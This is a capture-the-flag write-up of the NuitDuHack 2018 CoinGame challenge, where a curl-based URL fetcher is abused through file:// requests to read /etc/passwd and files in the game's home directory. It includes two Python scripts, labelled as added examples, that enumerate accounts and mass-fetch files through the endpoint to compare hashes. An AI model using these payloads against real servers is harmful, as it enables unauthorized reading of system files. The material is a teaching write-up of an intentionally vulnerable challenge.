NuitDuHack 2018 CoinGame
NuitDuHack 2018 CoinGame Challenge writeup

I did not get much time to play this CTF, but within the time I had, CoinGame was one of the challenges I was able to solve. It had comparatively fewer solves than the other web challenges, but it was easy.

Challenge link : http://coingame.challs.malice.fr/

Points: 200

About the challenge: we get a welcome page that says "CURL service" and a textbox into which we can (presumably) enter URLs.

The page source revealed nothing. But after submitting google.com in the textbox, we noticed the request that was sent (curl.php?way=<url>) and a page showing the fetched response with status 302 (the redirect Google answers with). The request URL made it clear what we were dealing with: the server fetches whatever URL we hand it, so it is a server-side request forgery, and because curl understands the file:// scheme, that turns into local file read, i.e. LFI.

The very next step was to read /etc/passwd. http://coingame.challs.malice.fr/curl.php?way=../../../etc/passwd returned nothing, because the value is handed to curl as a URL and a bare relative path is not one, but http://coingame.challs.malice.fr/curl.php?way=file:///etc/passwd gave us the list of every account on the system (not all of them are login accounts, but the home directories and shells tell you which ones are).
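The pivot from the /etc/passwd dump to the next probe is mechanical enough to script. The following is an added example, not code from the writeup or from the challenge: it parses a passwd file, keeps only the accounts that look like real logins (uid >= 1000 with an interactive shell), and builds the curl.php?way=file://... URL for a candidate file in each home directory. The passwd content is a constructed sample, not the server's real output, and the filenames to try are whatever you pick.

```python
from urllib.parse import quote

# Constructed sample of what file:///etc/passwd might return; NOT the challenge's real output.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tftp:x:107:112:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
CoinGame:x:1000:1000::/home/CoinGame:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Base URL of the challenge, taken from the writeup.
BASE = "http://coingame.challs.malice.fr"


def parse_passwd(text: str) -> list:
    """Parse /etc/passwd lines into dicts; malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _pw, uid, _gid, _gecos, home, shell = parts
        users.append({"name": name, "uid": int(uid), "home": home, "shell": shell})
    return users


def login_accounts(users: list) -> list:
    """Keep accounts that can actually log in: uid >= 1000 and a real shell.
    System daemons (nologin / false) are noise for this kind of enumeration."""
    return [
        u for u in users
        if u["uid"] >= 1000
        and not u["shell"].endswith("nologin")
        and u["shell"] != "/bin/false"
    ]


def file_probe_url(base: str, path: str) -> str:
    """Build the curl.php?way=file://<path> request that reads a local file."""
    return f"{base}/curl.php?way=file://{quote(path)}"


def candidate_urls(base: str, users: list, filenames: list) -> list:
    """One probe URL per (login account, filename) pair, e.g. /home/<user>/Bonus.py."""
    return [file_probe_url(base, f"{u['home']}/{fn}") for u in users for fn in filenames]


if __name__ == "__main__":
    accounts = login_accounts(parse_passwd(SAMPLE_PASSWD))
    for url in candidate_urls(BASE, accounts, ["Bonus.py", ".bash_history"]):
        print(url)
```

Feed the real passwd dump into parse_passwd and the list of file names from the game's repository into candidate_urls; each URL can then be fetched with curl or requests.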

One particular thing that caught my eye was tftp. Since the challenge description had mentioned a game, I quickly googled it and found the link to the game's repo.

Since the file names were in the repo, I quickly checked whether the files on the challenge server were the same. Requesting http://coingame.challs.malice.fr/curl.php?way=file:///home/CoinGame/Bonus.py gave me the Bonus.py file.

I assumed the other challenge files would have the same names, so all we had to do was find the files that had been altered by the challenge admin. Going through the GitHub repo, I found that there were a lot of files, and fetching them by hand would be cumbersome.

So with the help of my teammate, dnvira, we put together a script that would fetch every file and subdirectory of the repo from the server through the file:// endpoint.

Comparing the hashes of the files in the cloned repo against the copies fetched from the challenge server showed a handful of files that differed. Going through them, a few images in gameAnimationImages had the flag written along the bottom edge.
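The fetch-and-compare step described above, written out as an added example (this is not the script the author and dnvira used, which is not shown on the page): walk the local clone, hash every file, request the same relative path from the server under /home/CoinGame via curl.php?way=file://..., and bucket each file as same, different, or missing. It assumes curl.php returns the file body verbatim, as it did for Bonus.py; if the server wraps the body in HTML, strip the wrapper in http_fetch before hashing. The demo() function runs the whole thing offline against a constructed three-file "clone" and a fake server, so nothing in it touches the challenge host.

```python
import hashlib
import pathlib
import tempfile
import urllib.error
import urllib.request
from urllib.parse import quote

BASE = "http://coingame.challs.malice.fr"  # challenge host from the writeup
REMOTE_ROOT = "/home/CoinGame"              # directory where Bonus.py was found


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def local_hashes(repo_dir: str) -> dict:
    """Map relative path -> sha256 for every file in the cloned repo, skipping .git."""
    root = pathlib.Path(repo_dir)
    hashes = {}
    for path in root.rglob("*"):
        if path.is_file() and ".git" not in path.parts:
            hashes[path.relative_to(root).as_posix()] = sha256_hex(path.read_bytes())
    return hashes


def probe_url(base: str, remote_root: str, rel: str) -> str:
    """Build the curl.php?way=file://<remote_root>/<rel> request for one file."""
    return f"{base}/curl.php?way=file://{quote(remote_root + '/' + rel)}"


def http_fetch(url: str, timeout: float = 10.0):
    """Fetch a URL; None on HTTP/network error or on an empty body.
    Assumption: curl.php returns the file body verbatim. curl prints nothing for a
    local file that does not exist, so an empty body is treated as 'missing'."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read()
    except (urllib.error.HTTPError, urllib.error.URLError):
        return None
    return body or None


def compare_tree(repo_dir: str, base: str, remote_root: str, fetch=http_fetch, save_dir=None) -> dict:
    """Hash each file of the local clone against the server's copy of the same path.
    Files that differ are optionally written under save_dir for manual inspection
    (that is where the modified images would end up)."""
    result = {"same": [], "different": [], "missing": []}
    for rel, local_hash in sorted(local_hashes(repo_dir).items()):
        body = fetch(probe_url(base, remote_root, rel))
        if body is None:
            result["missing"].append(rel)
        elif sha256_hex(body) == local_hash:
            result["same"].append(rel)
        else:
            result["different"].append(rel)
            if save_dir:
                out = pathlib.Path(save_dir) / rel
                out.parent.mkdir(parents=True, exist_ok=True)
                out.write_bytes(body)
    return result


def demo() -> dict:
    """Offline run on constructed data: a three-file 'clone' and a fake server that
    serves one file unchanged, one with an appended trailer (stand-in for a modified
    image) and lacks the third. Not the real repo contents."""
    clone = tempfile.mkdtemp()
    files = {
        "Bonus.py": b"print('bonus')\n",
        "gameAnimationImages/coin1.png": b"\x89PNG constructed image bytes",
        "README.md": b"# CoinGame\n",
    }
    for rel, data in files.items():
        p = pathlib.Path(clone) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)

    server = {
        probe_url(BASE, REMOTE_ROOT, "Bonus.py"): files["Bonus.py"],
        probe_url(BASE, REMOTE_ROOT, "gameAnimationImages/coin1.png"):
            files["gameAnimationImages/coin1.png"] + b"<constructed trailer>",
    }
    return compare_tree(clone, BASE, REMOTE_ROOT, fetch=lambda url: server.get(url))


if __name__ == "__main__":
    print(demo())
```

Against the real target you would call compare_tree("path/to/clone", BASE, REMOTE_ROOT, save_dir="fetched") and then look at whatever lands in the "different" bucket. Hashing locally rather than eyeballing file sizes matters because a few bytes of text at the bottom of a PNG barely changes its length.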

flag{_Rends_l'_......

There were two places where I got stuck. One was tftp, which would have been a way to proceed further, and the other was fetching all the files. The former is where I was stuck for a long time.

Reach out to me on Twitter.

*****
Written by Gokul Krishna on 02 April 2018